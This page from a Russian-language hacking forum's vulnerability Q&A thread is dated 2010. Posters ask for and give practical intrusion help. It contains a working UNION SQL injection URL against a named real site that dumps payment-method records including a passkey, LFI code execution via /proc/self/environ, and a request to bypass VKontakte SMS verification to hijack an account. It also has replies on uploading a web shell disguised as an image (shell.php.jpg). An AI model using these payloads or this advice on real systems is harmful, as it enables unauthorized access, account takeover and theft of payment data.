ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1287 из 1393 « Первая < 287787118712371277 1283 1284 1285 1286 1287 1288 1289 1290 1291 129713371387 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #12861  
Старый 02.05.2010, 11:25
a1ertso
Новичок
Регистрация: 16.12.2009
Сообщений: 29
Провел на форуме:
101927

Репутация: 0
По умолчанию
Вопрос по LFI.
Какие есть пути к логам и где их можно посмотреть?
Вот путь
Цитата:
/proc/self/environ
, через него я выполнил пхп команду, а где можно посмотреть под разные сервера?
 
Ответить с цитированием

  #12862  
Старый 02.05.2010, 12:39
DrakonHaSh
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305

Репутация: 30
Отправить сообщение для DrakonHaSh с помощью ICQ
По умолчанию
a1ertso
http://forum.antichat.ru/thread49775.html
 
Ответить с цитированием

  #12863  
Старый 02.05.2010, 13:48
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию
Делаю запрос к БД:

index.php?id=-157+union+select+concat_ws(0x3a,payment_method_id,
vendor_id,
payment_method_name,
payment_class,
shopper_group_id,
payment_method_discount,
payment_method_discount_is_percent,
payment_method_discount_max_amount,
payment_method_discount_min_amount,
list_order,
payment_method_code,
enable_processor,
is_creditcard,
payment_enabled,
accepted_creditcards,
payment_extrainfo,
payment_passkey),2,3,4+from+jos_vm_payment_method

Выводится следующая ошибка:

4:1:PayPals_paypal:5:0.00:0:0.00:0.00:0:PP:P:0:Y ::country."' ORDER BY country_2_code ASC"; $db1->query($q); $url = "https://www.paypal.com/cgi-bin/webscr"; $tax_total = $db->f("order_tax") + $db->f("order_shipping_tax"); $discount_total = $db->f("coupon_discount") + $db->f("order_discount"); $post_variables = Array( "cmd" => "_ext-enter", "redirect_cmd" => "_xclick", "upload" => "1", "business" => PAYPAL_EMAIL, "receiver_email" => PAYPAL_EMAIL, "item_name" => $VM_LANG->_('PHPSHOP_ORDER_PRINT_PO_NUMBER').": ". $db->f("order_id"), "order_id" => $db->f("order_id"), "invoice" => $db->f("order_number"), "amount" => round( $db->f("order_subtotal")+$tax_total-$discount_total, 2), "shipping" => sprintf("%.2f", $db->f("order_shipping")), "currency_code" => $_SESSION['vendor_currency'], "address_override" => "1", "first_name" => $dbbt->f('first_name'), "last_name" => $dbbt->f('last_name'), "address1" => $dbbt->f('address_1'), "address2" => $dbbt->f('address_2'), "zip" => $dbbt->f('zip'), "city" => $dbbt->f('city'), "state" => $dbbt->f('state'), "country" => $db1->f('country_2_code'), "email" => $dbbt->f('user_email'), "night_phone_b" => $dbbt->f('phone_1'), "cpp_header_image" => $vendor_image_url, "return" => SECUREURL ."index.php?option=com_virtuemart&page=checkout.re sult&order_id=".$db->f("order_id"), "notify_url" => SECUREURL ."administrator/components/com_virtuemart/notify.php", "cancel_return" => SECUREURL ."index.php", "undefined_quantity" => "0", "test_ipn" => PAYPAL_DEBUG, "pal" => "NRUBJXESJTY24", "no_shipping" => "1", "no_note" => "1" ); if( $page == "checkout.thankyou" ) { $query_string = "?"; foreach( $post_variables as $name => $value ) { $query_string .= $name. "=" . urlencode($value) ."&"; } vmRedirect( $url . $query_string ); } else { echo '
'; echo ''; foreach( $post_variables as $name => $value ) { echo ''; } echo '
'; } ?>:

Доступа к админке нет.

Это можно как-то раскрутить?
 
Ответить с цитированием

  #12864  
Старый 02.05.2010, 14:29
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию
4:1:PayPals_paypal:5:0.00:0:0.00:0.00:0:PP:P:0:Y ::country

а это что?
 
Ответить с цитированием

  #12865  
Старый 02.05.2010, 15:16
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию
Цитата:
Сообщение от pinch  
4:1:PayPals_paypal:5:0.00:0:0.00:0.00:0:PP:P:0:Y ::country

а это что?

http://ethanol.li/techtab.php?id=-157+union+select+concat_ws(0x3a,payment_method_id,
vendor_id,
payment_method_name,
payment_class,
shopper_group_id,
payment_method_discount,
payment_method_discount_is_percent,
payment_method_discount_max_amount,
payment_method_discount_min_amount,
list_order,
payment_method_code,
enable_processor,
is_creditcard,
payment_enabled,
accepted_creditcards,
payment_extrainfo,
payment_passkey),2,3,4+from+ilseboc_joom.jos_vm_pa yment_method+limit+3,1+--+&uri=/products.php?id=157&lang=fr
 
Ответить с цитированием

  #12866  
Старый 02.05.2010, 15:21
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию
я не понимаю... что те именно раскрутить? кажется ты уже все раскрутил
 
Ответить с цитированием

  #12867  
Старый 02.05.2010, 20:21
Error0980
Новичок
Регистрация: 24.04.2010
Сообщений: 2
Провел на форуме:
6602

Репутация: 0
По умолчанию
Здравствуйте!
Добыл мыло и хотел бы выслать на него пароль от "вконтакте" но не так все просто как казалось бы, от меня соц. сеть требует ввести номер телефона введенного при регестрации пользователем "вконтакте" и получит на этот номер код для смены пароля.
Вопрос:как можно обойти смс и выслать пароль на почту?
Взарание спс...
 
Ответить с цитированием

  #12868  
Старый 02.05.2010, 22:29
daniel_1024
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831

Репутация: 34
По умолчанию
при заливке шелла в админке вот что мне вылетело:
Код:
Warning: imagesx(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253

Warning: imagesy(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253

Warning: imagecopyresampled(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 122

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 123

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 124

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 125

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 126

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 128
шелл не загрузился. есть ли какой-нибудь способ обхитрить php в это случае ?
 
Ответить с цитированием

  #12869  
Старый 02.05.2010, 23:26
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
Цитата:
Сообщение от daniel_1024  
при заливке шелла в админке вот что мне вылетело:
Код:
Warning: imagesx(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253

Warning: imagesy(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253

Warning: imagecopyresampled(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 122

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 123

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 124

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 125

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 126

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 128
шелл не загрузился. есть ли какой-нибудь способ обхитрить php в это случае ?
во-первых, загрузить корректный jpg(png,bmp,gif по вкусу) с кодом php-шелла - если расширение .php не меняется, ты смог это обойти или другой способ... то будет шелл.
во-вторых, судя по ошибкам - там картинки пережимаются скриптом, так что все пхп-теги и код будет утерян. Шелла не видать тебе.
 
Ответить с цитированием

  #12870  
Старый 02.05.2010, 23:27
b82a
Участник форума
Регистрация: 07.02.2010
Сообщений: 111
Провел на форуме:
619439

Репутация: 127
Отправить сообщение для b82a с помощью ICQ
По умолчанию
Цитата:
Сообщение от daniel_1024  
при заливке шелла в админке вот что мне вылетело:
Код:
Warning: imagesx(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253

Warning: imagesy(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253

Warning: imagecopyresampled(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 122

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 123

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 124

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 125

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 126

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 128
шелл не загрузился. есть ли какой-нибудь способ обхитрить php в это случае ?
Оно как бе пытается ресайзнуть картинку, но не получается, shell.php.jpg пробовал?
 
Ответить с цитированием
Ответ
Страница 1287 из 1393 « Первая < 287787118712371277 1283 1284 1285 1286 1287 1288 1289 1290 1291 129713371387 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ